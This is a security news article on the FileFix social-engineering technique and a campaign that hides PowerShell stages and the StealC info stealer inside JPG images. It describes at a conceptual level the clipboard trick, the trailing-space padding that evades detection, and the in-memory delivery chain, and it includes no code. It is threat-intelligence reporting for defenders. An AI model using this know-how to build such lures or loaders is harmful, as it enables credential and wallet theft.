New FileFix Attack Drops StealC Payload

FileFix's latest evolutions show how a clever user-interaction trick plus a dusting of steganography can turn familiar OS features into a stealthy malware-delivery pipeline. Security researchers observed an active campaign that hides a second-stage PowerShell script and encrypted payloads inside seemingly innocuous JPG images.

The initial FileFix stage pushes a downloader that retrieves the image, extracts the embedded code, and decrypts and executes the payloads in memory. That chain results in a final-stage info stealer, StealC, being dropped. The info stealer can harvest browser credentials, crypto wallets, messaging app data, cloud credentials, and more, delivered in a way designed to evade many existing detections.

An attack campaign initially discovered by Acronis researchers has elevated FileFix from proof-of-concept curiosity to a multistage, production-capable attack using steganography to conceal code and encrypted executables inside images hosted on developer hosting services. In cybersecurity, steganography is the practice of concealing a secret message or data within an ordinary, non-secret file or message to hide its existence from unauthorized parties.

Unlike cryptography, which scrambles data to make it unreadable, steganography hides the fact that sensitive information is present by embedding it within seemingly innocuous carrier files like images, audio, or video files.

Rather than serving the second-stage script as a plainly named .ps1 file or an executable on the web, the attacker embedded the data within a JPG. When the initial command runs, it downloads that image, parses the hidden payload from the image bytes, and loads the decoded artifacts into memory for execution, leaving only an image download in many telemetry trails. This design increases both operational opacity and deception. Defenders seeing an image fetch are less likely to treat that activity as a binary payload retrieval.

Acronis' analysis shows the attacker layered obfuscation measures across attack stages:

• The first-stage PowerShell itself appears as an innocuous path string to the end user, but actually contains an obfuscated command that fragments, decodes, and reconstructs subsequent stages.
• The image-parsing stage extracts a Base64-like blob that the script then decrypts and decompresses into an in-memory loader. That loader performs sandbox and VM checks and then launches StealC, implemented as a Go-based loader that shields strings and indicators from static analysis.
• The combined effect reduces the number of clear indicators that endpoint detection tools and analysts rely on, shifting the attack's telemetry toward mundane events: a clipboard paste, a File Explorer address bar navigation, and an image download.

Embedding a payload into an image supplies several operational advantages for an attacker:

• First, it hides payloads from simple URL or file-type filters, as many detection stacks focus on executable file extensions and script downloads; image files often receive less scrutiny.
• Second, when the payload resides on benign hosting, for example, a Bitbucket-hosted image, defenders face harder attribution and takedown decisions, and the hosting provider's standard traffic patterns help the malicious file blend into noise.
• Third, loading and decrypting payloads in memory avoids writing disk artifacts that trigger forensic alarms. In short, steganography complements FileFix's social-engineering root by reducing noisy indicators and increasing the attack's dwell time and chances of success.

FileFix and How Ransomware Operators Can Use It

FileFix is a user-assisted execution trick that evolved from the ClickFix family of attacks. Where ClickFix coaxed targets into pasting malicious PowerShell into the Run dialog or a terminal, FileFix instead abuses the Windows File Explorer address bar as the execution vector.

The social-engineering bait presents what appears to be a legitimate file path—an "incident report" PDF, for example—and instructs the user to copy it and paste it into File Explorer. In reality, the attacker copies a crafted payload to the clipboard, including a normal-looking path followed by hidden, malicious PowerShell commands.

When pasted into the Explorer address field and executed, the OS acts on the payload, often without obvious prompts. Hence, a user believes they have only opened a file while, behind the scenes, a command executes.

Technically, FileFix exploits how Windows interprets specific path formats and command delimiters. Early ClickFix variants used the hash symbol or other comment markers to hide commands; FileFix altered that approach by using variable-padding and long trailing spaces to show a visible path in the UI, but the payload remains present in the clipboard string.

That subtle change sidesteps simple indicator rules that search for the "#" character and other well-known ClickFix signatures. This attack methodology works as users inherently trust the UI, thus making it the weakest exploitable link. Further, defenders who rely on pattern-matching for known markers can be bypassed.

The attack campaign to drop StealC is not the first time a threat actor has used FileFix in the wild. The method crossed from research forums into criminal practice when the Interlock ransomware group adopted FileFix to install remote access Trojans (RATs) and later ransomware components.

Reporting shows Interlock leveraged the original PoC in earlier cases, using FileFix to drop remote access tools that allowed follow-on lateral movement and data exfiltration before encryption. The group's use of FileFix confirms a disturbing pattern: techniques disclosed or demonstrated by researchers can quickly be weaponized by criminals when their trade craft proves as effective as the disclosed technique.

FileFix's appeal stems from combining low-cost social engineering with high reward. The required infrastructure is minimal: a convincing phishing page, a location to host payload images or scripts, and a clipboard-copy mechanism that masks the malicious parts of the string. As the attack depends primarily on human behavior, a user following an instruction, it does not require zero-day exploits or complex malware-signing infrastructures.

That fact makes FileFix attractive for financially driven threat actors pushing info-stealers like StealC and higher-tier threat groups seeking initial access for ransomware campaigns. The recent steganography layer increases this scalability by enabling modular payloads: attackers can swap in different in-memory loaders and final-stage payloads without changing the front-end phishing lure.

FileFix demonstrates how small changes in attack surface, leveraging a trusted UI element and hiding code inside apparently benign media, can dramatically increase the stealth and reach of relatively unsophisticated social-engineering campaigns.

The recent campaigns that combine FileFix with steganography underline a critical truth for defenders: attackers do not need novel exploits when they can convert legitimate OS behaviors and benign file types into reliable delivery mechanisms. Stopping such hybrid attacks requires layered controls that reduce the value of user-directed execution, raise the cost of invisible payload hosting, and detect the subtle telemetry patterns that reveal multistage, in-memory infections.